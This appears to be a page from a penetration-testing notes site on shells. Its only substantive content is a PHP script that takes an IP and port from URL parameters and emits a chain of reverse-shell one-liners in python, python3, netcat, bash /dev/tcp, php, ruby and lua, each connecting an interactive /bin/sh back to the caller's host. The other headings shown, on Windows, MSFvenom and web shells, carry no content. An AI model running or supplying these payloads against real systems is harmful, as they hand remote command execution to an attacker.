Shells

Reverse Shells

Dynamic revshell

<?php

$ip = isset($_GET['ip']) ? $_GET['ip'] : 'localhost';
$port = isset($_GET['port']) ? $_GET['port'] : '9001';

$xct = <<<EOT
if command -v python > /dev/null 2>&1; then
    python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{$ip}",{$port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v python3 > /dev/null 2>&1; then
    python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("{$ip}",{$port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
    exit;
fi

if command -v nc > /dev/null 2>&1; then
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f
    exit;
fi

if command -v sh > /dev/null 2>&1; then
    /bin/sh -i >& /dev/tcp/{$ip}/{$port} 0>&1
    exit;
fi

if command -v php > /dev/null 2>&1; then
    php -r '$sock=fsockopen("{$ip}",{$port});exec("/bin/sh -i <&3 >&3 2>&3");'
    exit;
fi

if command -v ruby > /dev/null 2>&1; then
    ruby -rsocket -e'f=TCPSocket.open("{$ip}",{$port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    exit;
fi

if command -v lua > /dev/null 2>&1; then
    lua -e "require('socket');require('os');t=socket.tcp();t:connect('{$ip}','{$port}');os.execute('/bin/sh -i <&3 >&3 2>&3');"
    exit;
EOT;

echo $xct;
?>

Python generator

Windows

MSFvenom

Web Shells

Edit the following script to add our authorized IP address (line 59).

Shell Upgrade

Spawning Interactive Shells

References

PreviousDocker BreakoutNextSSTI

Last updated